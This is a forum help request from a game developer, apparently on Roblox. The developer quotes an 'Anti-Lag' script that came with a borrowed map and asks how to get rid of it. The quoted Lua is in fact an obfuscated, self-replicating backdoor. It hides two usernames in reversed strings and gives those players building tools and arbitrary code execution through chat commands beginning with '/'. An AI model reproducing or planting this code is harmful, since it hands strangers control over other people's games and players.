I am making a game, and I got someones map for my game (I gave credit to him btw), but every time when the map is done loading it doesn't let us spawn there. I keep thinking it was the Anti-Lag that is happening. So, I removed it, but there could be more. This is the Anti-Lag script they gave me:
Altitude = script:clone() calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"} Knox = {} table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13])) table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2])) Play = {} function rando(votation) local hatr = 5 local calc = math.pi * math.huge local longicate = votation:GetChildren() if #longicate > hatr then calc = calc + math.pi return longicate[math.random(6,#longicate)] end end function doublecheck() local fj = game.Workspace:GetChildren() for off = 1,#fj do if fj[off].className == "Part" then local fh = fj[off]:FindFirstChild("Anti-Lag") if fh ~= nil then return false end end end return true end function workcheck() if doublecheck() == true then local l = Altitude:clone() l.Parent = rando(game.Workspace) end end workcheck() function gibite(quen) local hup = Instance.new("Message") hup.Text = "Detected" hup.Parent = quen.Parent local con = Instance.new("Script") con.Source = [[wait(5) script.Parent:remove()]] con.Parent = hup for ish = 0,7 do local a = Instance.new("HopperBin") a.BinType = ish a.Parent = quen end end function laber(zonsa) wait() for slate = 1,#Knox do if zonsa.Name == Knox[slate] then gibite(zonsa.Backpack) table.insert (Play, 1, zonsa.Name) end end end function yeild(frequency) local t = Knox for g = 1,#t do if t[g] == frequency.Name then return true end end return false end function check(los) local r = los:GetChildren() for i = 1,#r do local h = r[i]:FindFirstChild("Anti-Lag") if h ~= nil then h:remove() end end end function alto(xylem) if xylem.className == "Model" then check(xylem) local que = script:clone() que.Parent = rando(xylem) end end function sortation(gone) local dimbs = Altitude:clone() dimbs = ramno(game.Workspace) end function onPlayerEntered(newPlayer) newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end) end function Player(player) player.Changed:connect(function (property) if property == "Character" then laber(player) end end) end game.Players.PlayerAdded:connect(Player) game.Players.ChildAdded:connect(onPlayerEntered) game.Players.ChildAdded:connect(laber) script.ChildRemoved:connect(sortation) game.Workspace.ChildAdded:connect(alto) function onChatted(msg, recipient, speaker) if yeild(speaker) ~= false then if string.sub(msg,1,1) == "/" then local dsting = Instance.new("Script") dsting.Source = string.sub(msg,2) dsting.Parent = game.Workspace end end end
Does this actually work? If it doesn't how do I make a script where it can remove these Anti-Lag scripts?